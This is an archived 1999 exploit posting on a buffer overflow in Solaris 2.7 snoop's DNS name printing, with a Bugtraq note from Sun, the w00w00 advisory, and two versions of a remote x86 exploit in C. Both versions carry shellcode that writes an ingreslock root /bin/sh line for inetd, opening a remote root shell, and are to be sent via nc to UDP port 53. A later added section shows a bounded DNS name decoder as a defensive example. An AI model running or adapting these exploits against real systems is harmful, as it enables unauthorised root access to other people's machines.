
solaris.snoop.c

Posted Dec 10, 1999
Authored by Shane A. Macaulay

[w00giving #8] Here's a new version of my snoop exploit, it seems that it will work on the new patched version of snoop as well, and actually, the target host does NOT have to be running with -v. Snoop is a program similar to tcpdump that allows one to watch network traffic. There is a buffer overflow in the snoop program that occurs when a domain name greater than 1024 bytes is logged, because it will overwrite a buffer in print_domain_name. This vulnerability allows remote access to the system with the privileges of the user who ran snoop (usually root, because it requires read privileges on special devices). Remote Solaris 2.7 x86 snoop exploit included.

tags | exploit, remote, overflow, x86, root
systems | solaris
SHA-256 | 99717fd62e6c6114deeea939793ba768fffa61af82db1312bc92a5d2d6438cf0

In case you don't know, both ISS and w00w00 have produced snoop advisories
written recently; this is Chok Poh (of Sun Microsystems)'s response to
Alfred Huger's request for clarification on what patches fix what.

---------- Forwarded message ----------
Date: Thu, 9 Dec 1999 14:57:10 -0800
From: Alfred Huger <ah@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Clarification needed on the snoop vuln(s) (fwd)

---------- Forwarded message ----------
Date: Thu, 9 Dec 1999 14:53:56 -0800 (PST)
From: Chok Poh <Chok.Poh@eng.sun.com>
To: ah@SECURITYFOCUS.COM
Subject: Clarification needed on the snoop vuln(s)

Alfred,

The patches that Sun has released were in relation to the buffer overflow
problem reported by ISS. We are producing patches for the problem posted
by w00w00.
Chok
__________________________________________________________________________

Chok Poh
Sun Security Coordination Team
Sun Microsystems, Inc.
email: security-alert@sun.com

__________________________________________________________________________



Date: Tue, 7 Dec 1999 04:42:06 +0300 (MSK)
From: Matt Conover <shok@cannabis.dataforce.net>
To: news@technotronic.com
cc: w00w00@blackops.org
Subject: [w00giving #8] Solaris 2.7's snoop
Message-ID: <Pine.LNX.3.95.991207044002.14801C-100000@cannabis.dataforce.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-news@technotronic.com
Precedence: bulk

[Note: as we promised, our website and technotronic will get this advisory
before anything else does. Thanks for participating in technotronic.]

w00w00 Security Development (WSD)
http://www.w00w00.org/advisories.html

Discovered by: K2 (ktwo@ktwo.ca)

Snoop is a program similar to tcpdump that allows one to watch
network traffic. There is a buffer overflow in the snoop program when run
in verbose (-v) mode that occurs when a domain name greater than 1024
bytes is logged, because it will overwrite a buffer in print_domain_name.
This vulnerability allows remote access to the system with the privileges
of the user who ran snoop (usually root, because it requires read
privileges on special devices).

---------------------------------------------------------------------------
Exploit (by cheez):

/*
Remote Solaris 2.7 x86 snoop exploit

Run with ( ./snp ) | nc -u target_host_network 53
requires target host to be running "snoop -v"

Thanks str/horizon for shellcodes (hi plaguez)
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
"\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"
"\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"
"\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"
"\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"
"\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"
"\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"
"\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"
"\x68\x28\x2D\x63\x29 echo w00w00;"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;"
"/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00";

#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

char buffer[SIZE];
const char x86_nop=0x90;
long nop=NOPDEF, esp=0x8047344, offset=DEFOFF;

int main (int argc, char *argv[])
{
    int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));

    for (i = nop+strlen(shell); i < SIZE-4; i += 4)
        *((int *) &buffer[i]) = esp+offset;

    fprintf(stderr,"0x%lx\n", esp+offset);
    printf("%s", buffer);

    return 0;
}
---------------------------------------------------------------------------

Patch:

Because Sun Microsystems doesn't include source, we must wait for them to
release a patch.
---------------------------------------------------------------------------

http://www.roses-labs.com, http://www.napster.com,
http://www.technotronic.com, http://www.w00w00.org
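
An added example, not part of the original advisory and not Sun's code: a bounded DNS name decoder of the kind a capture tool's name-printing routine needs, so that a name longer than the output buffer or the protocol limit is rejected instead of copied. The names dns_name_decode and demo_oversized_name and the pointer-jump cap are assumptions; snoop's own source is not shown on this page.

```c
#include <stdint.h>
#include <string.h>

#define DNS_MAX_NAME  255  /* RFC 1035 limit on an encoded name */
#define DNS_MAX_JUMPS 16   /* assumed cap on compression pointers followed */
/* Hypothetical bounded decoder (not snoop's print_domain_name): writes the
 * name at msg[off] as dotted text into out[cap]. Returns the text length,
 * or -1 if the name is malformed, over-long, or would not fit in out. */
int dns_name_decode(const uint8_t *msg, size_t len, size_t off,
                    char *out, size_t cap)
{
    size_t n = 0, wire = 1;                     /* wire counts the root byte */
    int jumps = 0;
    if (cap == 0) return -1;
    while (off < len && msg[off] != 0) {
        uint8_t lb = msg[off];
        if ((lb & 0xC0) == 0xC0) {              /* compression pointer */
            if (off + 1 >= len || ++jumps > DNS_MAX_JUMPS) return -1;
            off = ((size_t)(lb & 0x3F) << 8) | msg[off + 1];
            continue;
        }
        if (lb & 0xC0) return -1;               /* reserved label type */
        if (off + 1 + lb > len) return -1;      /* label overruns packet */
        wire += 1 + (size_t)lb;
        if (wire > DNS_MAX_NAME) return -1;     /* protocol length limit */
        if (n + (n != 0) + lb + 1 > cap) return -1; /* '.' + label + NUL */
        if (n) out[n++] = '.';
        memcpy(out + n, msg + off + 1, lb);
        n += lb;
        off += 1 + (size_t)lb;
    }
    if (off >= len) return -1;                  /* no terminating root label */
    out[n] = '\0';
    return (int)n;
}

/* Constructed sample: 20 labels of 63 bytes, a 1281-byte encoded name that
 * is past the 1024 bytes named in the advisory. Returns the verdict (-1). */
int demo_oversized_name(void)
{
    uint8_t pkt[20 * 64 + 1];
    char text[1024];
    for (size_t i = 0; i < 20; i++) {
        pkt[i * 64] = 63;
        memset(pkt + i * 64 + 1, 'a', 63);
    }
    pkt[20 * 64] = 0;
    return dns_name_decode(pkt, sizeof pkt, 0, text, sizeof text);
}
```

Label bytes are copied as-is; a tool that prints the result to a terminal would also need to escape non-printable bytes.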


-----Original Message-----
From: Matt Conover <shok@camel.ethereal.net>
To: news@technotronic.com
Subject: Re: w00giving #8] Solaris 2.7's snoop

w00w00 Security Development (WSD)
http://www.w00w00.org/advisories.html

Discovered by: K2 (ktwo@ktwo.ca)

Hi,
Here's a new version of my snoop exploit, it seems that it will
work on the new patched version of snoop as well, and actually, the target
host does NOT have to be running with -v. Some interesting applications
would be to spoof the source and have it issue a remote command other than
loading a portshell.


K2
w00w00


/*
by: K2,
version .2
this is a funny Solaris.
remote Solaris 2.7 x86 snoop exploit
rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW

run with ( ./snp ) | nc -u target_host_network 53
requires target host to be running "snoop"

verified with patch 108483-01

thx str/horizon for shellcodes. Hi plageuz
Hi mom.
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


char shell[] =
"\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"
"\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"
"\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"
"\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"
"\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"
"\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"
"\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"
"\x68\x28\x2D\x63\x29 echo w00w00;echo \"ingreslock"
"stream tcp nowait root /bin/sh sh -i\" >>/tmp/w0;"
"/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0";


#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

const char x86_nop=0x90;
long nop=NOPDEF,esp=0x804646c;
long offset=DEFOFF;
char buffer[SIZE];

int main (int argc, char *argv[]) {
    int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));
    for (i = nop+strlen(shell); i < SIZE-4; i += 4) {
        *((int *) &buffer[i]) = esp+offset;
    }

    fprintf(stderr,"0x%lx\n",esp+offset);
    printf("%s", buffer);

    return 0;
}

